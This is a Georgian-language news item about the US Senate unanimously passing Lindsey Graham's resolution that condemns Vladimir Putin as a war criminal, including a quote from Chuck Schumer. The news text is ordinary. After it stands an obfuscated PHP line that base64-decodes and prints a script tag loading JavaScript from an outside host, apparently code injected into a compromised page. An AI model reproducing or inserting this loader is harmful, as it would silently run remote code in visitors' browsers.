celsiusi
ავერსი შნაიდერი
აშშ-ის სენატმა ერთხმად დაუჭირა მხარი რეზოლუციას, რომელიც გმობს რუსეთის პრეზიდენტს, ვლადიმერ პუტინს, როგორც ომის დამნაშავეს. 
 
როგორც ცნობილია, რეზოლუცია, რომელიც „რესპუბლიკელმა“ სენატორმა ლინდსი გრეჰემმა წარადგინა ჰააგის საერთაშორისო სისხლის სამართლის სასამართლოსა (ICC) და სხვა ქვეყნებს მოუწოდებს, გამოიძიონ რუსეთის მიერ უკრაინაში შეჭრის დროს რუსი სამხედროების მიერ ჩადენილი ომის დანაშაულები.
 
„ამ პალატაში ყველანი ერთად გავერთიანდით, რათა განვაცხადოთ, რომ ვლადიმერ პუტინი ვერ გაექცევა პასუხისმგებლობას უკრაინელი ხალხის წინააღმდეგ ჩადენილი სისასტიკისთვის. შემდეგი ნაბიჯი ჩემთვის არის მუშაობა ჩვენს ბრიტანელ მოკავშირეებთან და, იმედია, სხვებთან, ერთადაც, რათა შევქმნათ სადაზვერვო უჯრედი, რომელიც საზოგადოებას მიაწვდის ინფორმაციას ომის დანაშაულებებში ჩართული რუსეთის სამხედრო შენაერთების შესახებ და დაიწყებს მათი მეთაურების დასახელებას“, - განაცხადა სენატის უმრავლესობის „დემოკრატმა“ ლიდერმა ჩაკ შუმერმა სენატის სხდომაზე სიტყვით გამოსვლისას.
806
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");